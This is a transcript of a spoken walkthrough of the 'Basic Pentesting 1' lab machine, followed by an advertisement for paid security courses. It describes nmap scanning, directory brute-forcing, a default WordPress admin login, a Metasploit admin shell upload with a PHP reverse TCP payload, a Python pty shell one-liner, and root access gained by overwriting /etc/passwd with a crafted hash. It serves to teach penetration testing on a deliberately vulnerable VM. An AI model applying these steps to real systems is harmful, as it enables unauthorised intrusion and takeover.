basic pen testing 1. Search for this. It was not getting. So we'll go with a series of basic pen testing. Here you can see, yeah, see here it is. Basic pen testing 1, 8 December 2017. It was released by a Joseph Pierce. Okay. So this is, I'll just click on this basic pen testing 1. Okay. So description, this is a small boot to root. Boot to root means you can, it's a boot to root VM. You don't have to go with all installation procedures. Directly you have to import it. So you can able to use this virtual machine which have a multiple vulnerabilities. So VM I created for a university cybersecurity group. It contains a multiple remote vulnerabilities and multiple privilege escalation vectors. So different type of privilege escalating challenges are there. You can try out these things. I did all my testings for this VM on VirtualBox. So that's the recommended platform. I have been informed that it also works with VMware, but I haven't tested this personally. So it was saying like try with the VirtualBox rather than going with VMware, because VMware, the creator have didn't tested this machine. So this machine, the VM is especially intended for a newcomers to penetration testing. This is especially they are designed for a newcomers on the penetration testing. If you are a beginner, you should hopefully find the difficulties of VM to be just right. Your goal is to remotely attack the VM and gain root privilege access, means complete root access, means admin access. Once you have finished, try to find other vectors you might have missed. If you enjoyed the VM, have questions, feel free to contact me at this. If you finish the VM, please also consider posting a, yeah. So this is the file name, basic pentesting 1.ova. File size is 2.6 GB, MD5 hashing algorithm. So this is the hash key to check that the file, wherever you will get this file, you have to cross check that it's a legit file or not. For this thing, they have gave this hash keys. And format virtual machine and operating system Linux. So DSCP enable IP address admin design. So now we'll download this file. Okay. So here is the mirror link is there. This will be faster. It will get download. Okay. You can click on this link. It will start to download now. Okay. 2 hours it takes. Okay. We'll check this first one. Okay. The mirror link will be perfect one. So you need a proper internet connections to download this. So I hope I am having already this file. So I'll just check with my system. Well, now, yeah, here it is. So I already have downloaded. Once you downloaded, you will be getting in the zip file. Okay. So you have to extract this and then you will get this type of folder. So inside these two files will be there. So the basic pen testing 1.ova. So this is the, we will try out now first. So this is the file. So how can you install this one? Just go to the VirtualBox, click on new, not new. So we'll do one thing. We'll just add, we'll click on add. We'll go to the path where the file is there. Home, Razz, work, to where we have been downloaded this file, labs, one hub, basic pen testing. Or else we can do one other way. We'll just go to the folder, right click, open with Oracle VM VirtualBox. Click on this. So here you have to set up the networks. Okay, just after properly check everything, then click on finished. So now it's importing the file. But still it's downloading. I'll just cancel it. So it takes some time to import this basic pen testing one. So this why? Because I was showing you to understand the different strategies to hack into the systems. Okay. So this is the one I will show you how to do. Then rest of the others, one by one, you can try different machines with by vulnerable website. You can download and you can install it on your system, and then you can practice the different strategies how you can hack into the websites and the systems and all. So it's importing. So we'll wait for a few minutes. So it is done now. CSEC, it's imported now. Okay. Right click, settings, network, and here you have to keep host only adapter. Yeah, correct on VBox net 0. Okay, this is the interface you will have to be keeping. So okay, you can keep it as bridge adapter also. Start, double click and start the machine. It's open. Okay. Okay, now we don't, this something username was Marlin Spike and we don't know the password. Okay, so this system, uh, we don't know the password. We are not able to do login also. But how can we check the IP address also? Okay, so this system we have to now hack. So now we'll start on this mission. Okay, so I'll just go to the new tab. I'll just type ifconfig. So you have to check the network also properly. If you're keeping in the some other host only adapter, other interface will be there means. So you have to use that interface IP address. Okay, but here we have kept as a bridge adapter and WLAN 0. So that interface IP address is this one. So this network only I have to try nmap -sn, then 0/24. 175. I hope so. It's my IP address attacker. 144 is the Windows 7. 230 is a was a for Windows XP. Then 222 and 225. So I think so. This one is something new one. It have been came now. Okay. So 225. It's already there. So 225 is already there. So I think this is the something IP address, something new. So I'll just copy this IP address and try nmap space -caps on. I'll paste the IP address here. Yeah, done. Oh, cool. So this is the system. It's a Linux only. Okay. The OS is Linux. So this is our one level machine now. Okay. So now you can try for this other nmap commands also. Nmap space -help. So here there is a one advanced scan with -caps A, enables OS detection, version detection, script scanning, trace route. Okay, different. It's advanced scanning. So we'll try this also now. Okay. Okay, now what we have to do in the advanced scan, also I'll try it with the double hyphen. I need to scan all port numbers, all 65 535 ports. So only 3 ports only are open. Okay. So one is 21 port number, which is running FTP. The second one is 22 SSH, and the third one is 80, port number 80, which is running a HTTP. Oh, so it makes us clear that the port number 80 also is running, which is the web resources for the web hosting and all. So that port number is open. So first we'll go with the port number 21 FTP and the IP address. So we don't know the use name or something here. There is no use for this. So SSH also we don't know the key. Okay. So what we can do, we can try to check the port number 80. Okay. So for accessing the port number 80, you can go with a browser. So just what you have to do, paste this IP address and 80. Yo. So it gets that it works. And this is a default web page for the web server. The web server software is running, but no content has been added yet. So it's a completely suspense for us. Okay. So we don't have any idea. So what we can do, we can see the page source, right click. We have to find out some hidden keys or there are some hidden hint are there or not. We have to find it out. So right click and view page source. So the same thing is a simple HTML. So there is nothing it have been written here. So also the shortcut you can use Control U to see the page source, Control W to close a tab. Okay. So shortcut makes it little easy to perform the task. Okay. It's better if you learn some shortcuts and all. Okay. Now what we will do, now we will try to find out different directories of this website. Okay. So here we can use the one tool called as DRB. Okay. So what this tool will be doing, this tool will check different directories. Here the directories will be there now, so it will try to find a different hidden directories, because here it's a normal IP address, so it can be hidden some directories. So this tool, this dirb tool name is dirbuster. So it will be brute forcing different directories, and it will check that which directories are working, and that's how we can find out the hidden directories in on the target. See. Cool. So we got a lot of results. Will not do late. We'll go with different one. Index.html. We'll check this. It says at 200. So 200, 300, 400. It's a HTTP code. HTTP status code. List of HTTP status code. 200 means it's running. 300 means redirection. Okay, see here. One access. Informational response. 200 means successfully. The request was successfully received, understood, and accepted. 300 means redirections. Whatever the request you're doing for the website, it redirecting to the other website something. 400, like it's a client error. Means from our side, we have used some wrong uh, details, like wrong domain name, wrong website name and all. So this is like 400 error, and 500 like server error. The server failed to fulfill an apparent valid request. So this is something important. You can check it out. Okay. So 200 is like successful. So this link is success link. We'll just copy this and we'll open it in the browser. Same website only. So this will not work. And this is like already 403 means not found. We will leave this thing. Index done. No. Okay, these are the places it can run. I think so. This. Okay, we'll check this one. Entering directory. We'll copy this and we'll paste it. Secret directory. Directory name only secret. Oh, it's loading. It's connecting to VTC sec. Why it takes too much time to load? So it takes little late, but we got the page. But it's not. We got one WordPress website is running, and there no properly content have been came. So no problem. We'll check something. We can get a clue. So this is like a CTF, capture the flag challenge type. You have to find out the way to get into the system. Okay. So this is something like WordPress website. So welcome to WordPress. Here the links are there, which is redirecting to the some your host name is there, VTC sec, the first one. See the first character, it shows as VTC sec, VTC sec slash. So in the place of IP address, it shows at VTC sec slash secret. So I think it is configured as a, this IP address configured as a means the host name is like VTC sec. So we'll see the page source also. Can we find something? Okay. See, everywhere it was written as like VTC sec. There was no IP address. There is nothing. So it say it's redirecting to the VTC sec. I think so. We have to keep the host name as VTC sec. Then we can see the full content here. So I'll just open the terminal. Then there is a file called as host file. So here contains of that. The see, this is the loopback IP address. This IP address. What's the host name? Local host. Okay. When someone search this one, so it will connect with this IP address. So already I have been set this one. I will be using nano to open this file. Okay, and here we'll keep this IP address. 198.29 point. Oh, I don't remember. It's okay. I'll just close it. So what was the IP address of the target? Okay, here we can see now. Okay, this is the IP address. Okay, so here we'll set up the same IP address. Okay, no HTTP. Control O to save, Control X to exit. Okay, now we'll open the new tab. We'll type VTC sec. Okay, now we'll type great. Oh, cool. See, we got a good website, good looking website properly. Okay, so that's how up to here it's fine now. Can we do one thing? Admin page. We'll check the admin page. WordPress. Okay. Okay. Secret slash WP hyphen admin. WP hyphen admin. Okay. Use this one WP hyphen admin. We'll try to access the admin page. Okay. Still not good. WP hyphen. Oh, cool. We got this VTSec admin page where the login you can do, but I don't know the username and password. Can we try the default username and password to get into the access? Default username and password for WordPress admin login. Admin username and password is password. Okay, username will be username is default username is admin and password can be password. I think so. Okay, we'll do one thing. Username admin and password is password. We'll try to do login in this way. Okay. Username admin and password also admin. Oh, cool. See, we have tried the username, default username admin and password also admin. So it was working. See, we got now admin page of the victim, WordPress admin page. So there is a one exploit is there for that, but WordPress. Okay, for what if you have if you have access of the WordPress admin page, so there is a exploit. So we will try this thing. So how can we do? Chalo, we will keep the session in background. Then we'll search uh platform WordPress type exploit. Okay, enter. So we got a bunch of exploits. So here we can find out the exploit what we needed. Admin Unix admin cell upload. Okay, this is the exploit we'll be using. Excellent. The rank is excellent. WordPress admin in cell upload. Okay, then you can try this thing. I'll just copy, use, and then done. Okay, if you want to see the information of this exploit, you can check it out. You can read the WordPress password for entering with. We need a username and passwords. Then we will be able to get the user access, means complete admin access. Okay, so for now what we have to do, so options, type so options and check it out what type of configurations we can do now. So first you have to set up the password of this admin page. Set password password, and the password was admin, and then set next what, username. username. Username was admin only. Okay. Then target IP address. Set R host. So R host was, what was the R host? I'll just go to the browser. Okay, this is the IP address. 222. Set R host. I'll set this thing. Oh, sorry. I'll just set the IP address. Okay, done. Okay. ROS means remote host, username of the admin page, and the password of the admin page. Then target URL, the base part to the WordPress application. So what was the base pass? It was target URI. It was set copy target URI. So here, just copy this, paste it here, enter, done. Now next, set payload. Okay, first we'll check everything have been done or not. So options, PHP, meter, reverse TCP. The payload also have been set. The attacker IP address, the attacker listening port number. Okay, done. Everything is done. Username, password, target IP address, and the R port is the port number 80 because it's a web resource, and the target URI. All have been done. Now type on run. Can we do one thing? It was not happening now. Okay. Set target URI secret. Okay, secret. And so option. Now we'll type run. Okay, something is going good. Cool, we got access now. Help. Screenshot. Oh, this is for different things. System info. Okay, see the computer VTC sec. We got access now. So get UID. Okay, so we have a www-data. So this is the user access we are having now. Okay, now cell to get the access. dir. Okay, not dir. It's not. It's a Linux. So we have to type pwd, print working directory. Okay, no response. So first we'll try to get the interactive cell. We'll type which Python to check the Python have been installed or not. Cool. So Python have been installed in the Linux system of our victim Linux system. So the script is Python -c single quote import pty semicolon pty dot spawn spawn, then double quote here bin slash bash single quote, done. So now pwd is not working. Word saying cannot access the parent directory id. Sudo space su. So we don't know the password of this thing. So now we need a complete admin access. Okay, exit. Okay, here what we can do, we can check the password file of victim machine ls by ls etc and the password file of Linux. Okay, so we have a read permission of this password file, and I think we can download this file now on our own local machine. So where we can download? So I'll create one folder called as one VULN1. Okay, ls. So here is the folder cd1 pwd. So I will download this password file and I'll save it in our own local machine, to which I've been created. So download password file and saved it in our own local machine. Enter, hit download it. Now I'll go to the new another tab and I'll type ls and I'll check. See, we have downloaded it successfully. Cat space password file. So this is the file of victim machine. Okay. So now what we can do, we will here this I have already explained in the on Linux class. Okay, the Linux video, like about the password file and shadow files, the use of password file and shadow files. The password files contains of the user informations, and the if it's mentioned as X, okay, it means like the password can be stored here. The password have to be there. It can be stored in the shadow file, and shadow files will be very difficult to get the complete access. Okay, so now what we can do, we can replace with X with a any hashing password, hashing algorithm password. Okay, so we'll create our own password. Open SSL space password hyphen help. So this is the one tool called as Open SSL password. By using this, we can able to create a password on hashing algorithm. Man space open SSL PASSWD. See, compute password hashes. This command computes the password type. Hyphen use the MD5 based. Okay, MD5 algorithm we will use. Okay, here. So open SSL PASSWD password hyphen one. So I'll just keep a password as Razz. Okay, Razz will be the password. Enter. See, we got in the hashing algorithm of MD5. Hyphen one is mean by MD5 algorithm. Okay, in the Razz MD5 algorithm, MD5 hash value is this one. So we'll paste this one in the place of this X, and then we will upload it back to the victim machine, and then we will able to do login. So I'll just copy this. So nano space password pasted. Control O to save. Control X to exit. So cat space password pipe grep root. Okay, see here the password what we have saved here. So this is the hashing. The value was Razz. Okay, the password was Razz. Now we have to upload it back. Upload. Now this is the target. Like from here we have to upload now. Paste it here and PASSWD password space, and this is the path of the victim machine where we have to upload it back. So it will override with the old password. So what we are doing forcefully, we are overwriting our modified password file where we kept our own password. Okay, so that's how you can compromise the system. Okay, ready, enter, done. This is overrated now. Okay, now we'll try to get access cell. Okay, now we'll try python -c import pty. So this is the very nice script for getting a interactive cell from a victim machine, because every time you will not comfortable with to use the commands. Sorry, single quote it have to become bin slash bash. So here is the path where this cell will be there. See, we got a very good cell now. So sudo space -l. So it's asking for the this one. So what's the person? Raz. Enter. Okay. Okay. So no. Sorry, there was small mistake. Python -c pty dot spawn spawn bin bash. Cool. Now sudo space root sudo space hyphen l. Okay. Sudo super user do of root hyphen l. So it's asking for a password. Okay, it was actually I don't have to use completely sudo super user space root space hyphen l. So now we are trying to say that switch user to root and space hyphen l. Okay, so now we have to give the password of root. Yeah, done. ID ID is root. The root access we got ls pwd ls. So here is the marlin. Go to the marlin ls. So if you want, we can change the password of marlin also. Marlin spike also. Marlin spike. Okay, changing the password of marlin spike and give a new Unix password for marlin spike is raz11 or else raz raz. Done. Okay, now we'll go to this place and we'll give a password raz and enter. Yeah, that's how you can get the access of the victim machine. So that's how you can it was stuck. Okay, so successfully we have changed the victim passwords. Okay, so that's how you can attack to the victim systems very easily. Okay, so yeah, so we'll end up here. I hope you guys have liked this session. uh okay, as a beginner now, so you guys will be having a lot of doubts like in the challenges, how to complete the challenges and all one by one. So what you can do, such basic, like whatever the challenges are there in Wattle Hub, okay, just search basic, the challenge name, basic pen testing one, pen testing one walkthrough. So here, the other researchers who have gone through about this blog and all, they will be writing the blog on this. So I have also have written one blog on this. See here, Razz Security. So this is my blog. So it's come on top first page. So here I wrote about the steps, whatever I did. So you can practice by seeing this one by one. Okay. So if you're not comfortable with my blog, you can go some others researchers who have wrote, okay, the security researchers, there's blogs also, you can go through it. Okay. So like that one by one challenges you have to solve, like basic pen testing one is there, then you can try basic pen testing two. Okay, so this is only for education purpose. Don't try this all attacks on the other systems without the permissions and all. So just to understand how the security measures you have to follow, you have to change the default username and passwords on the WordPress website wherever. Don't keep it in the common passwords, like whoever like how when you're taking installing the applications and the same password, don't keep it in the same way. You have to change it regularly, your passwords, and keep your network secure and connect with the uh, use the proper security measures on the your network. Okay, okay, 1 minute. I'll just show you the things. Okay, I'll just show you. So I have changed the password of victim machine. I'll just open the virtual box. Okay, what was the password? Raz and Raz. Enter. Don't upgrade. Okay. So see, we got it. View full screen. This is the victim machine. We got the access and we forcefully we change the password also. Terminal. sudo space su. What's the password for Marlin Spike? Raz, Raz. See, we got the root access now. Get password. So before we are not able to do login. Now see, we are able to do login. See, this is the RAS password. And you can also access the sudo file because you have a complete root privilege access now. You can do how the main admin can do to see how you crack the system. So that's how you can do with this thing. But don't try anything illegal here. Okay, by this knowledge, only try it for to make it secure your organization. Chalo then, thank you for attending. So now just search razzsecurity.com/courses/enter. Okay. And here we have a three different mode of that training: classroom training, online, and self-paced. So classroom training, like you will be coming to our headquarter, it in Bangalore, and you can learn under the guidance of trainer. Okay, so this all things today we have just performed this thing, but when you go into classroom training, you will go from basics, everything from basics, everything will be covered up with a proper guidance. Okay, so Linux practice, because Linux is also very important. This all things will be covering one by one. Okay, so classroom training is there, then online training. Okay, so who are not able to come to Bangalore and doing the training, they can go with the online live classes, and here self-paced. Okay, so recorded videos are there. Who are comfortable with the recorded videos? Recorded videos also is not bad. Okay, so you can go with the recorded videos, and recorded videos personally have designed from me only. Okay, so my recorded videos are there in that, in the self-paced. Okay, and the pricing also of this, we have did our best to keep it in the affordable pricing. Okay, so actual fees is around like 15,000. Okay, but currently we are giving it in 3,000 rupees, this course. In 3,000, like lifetime access, okay, of the course. Same topic, the topics are same only. And you can download the brochure actually. You can click here, the website. Yeah. So here it will be more deeply, and here roadmaps and all are there. You can get one idea. 15,000, but you just go with the online, like you can get a discount in 3,000, you can get it. And modules also, everything is clearly we explain whatever is there. And yeah, so you can download this, and if you are interested, you can enroll it from here only. You can directly pay, and our team will coordinate with you, and they will add you in the group and all.